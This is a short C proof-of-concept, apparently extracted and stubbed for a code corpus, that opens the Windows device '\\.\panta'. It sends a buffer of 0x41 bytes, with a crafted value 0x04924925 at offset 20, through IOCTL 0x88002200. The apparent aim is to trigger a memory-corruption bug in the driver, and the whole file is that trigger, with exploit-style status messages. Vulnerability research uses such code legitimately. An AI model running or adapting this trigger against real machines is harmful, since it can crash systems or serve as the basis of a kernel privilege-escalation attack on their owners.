
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef scalar_t__ HANDLE ;
typedef int DWORD ;


 int BUFSIZE ;
 int CloseHandle (scalar_t__) ;
 scalar_t__ CreateFile (char*,int,int,int *,int ,int ,int *) ;
 int DeviceIoControl (scalar_t__,int,unsigned char*,int,int *,int ,int*,int *) ;
 int FILE_SHARE_READ ;
 int FILE_SHARE_WRITE ;
 int GENERIC_READ ;
 int GENERIC_WRITE ;
 scalar_t__ INVALID_HANDLE_VALUE ;
 int MAX_PATH ;
 int OPEN_EXISTING ;
 int getch () ;
 int memset (unsigned char*,int,int) ;
 int printf (char*,...) ;
 int sprintf (char*,char*,char*) ;

int main(int argc, char *argv[])
{
    HANDLE hDevice;
    char devhandle[MAX_PATH];
    DWORD dwRetBytes = 0;
    unsigned char buffer[BUFSIZE];


    memset(buffer, 0x41, BUFSIZE);

    printf("\n[i] Size of total input buffer %d bytes", BUFSIZE);

    *(DWORD*)(buffer + 20) = 0x04924925;

    sprintf(devhandle, "\\\\.\\%s", "panta");

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, ((void*)0), OPEN_EXISTING , 0, ((void*)0));

    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Failed to open device %s\n\n", devhandle);
        return -1;
    }
    else
    {
        printf("\n[+] Open %s device successful", devhandle);
    }

    printf("\n[~] Press any key to continue . . .");
    getch();

    DeviceIoControl(hDevice, 0x88002200, buffer, BUFSIZE, ((void*)0), 0, &dwRetBytes, ((void*)0));

    printf("\n");
    CloseHandle(hDevice);
    return 0;
}
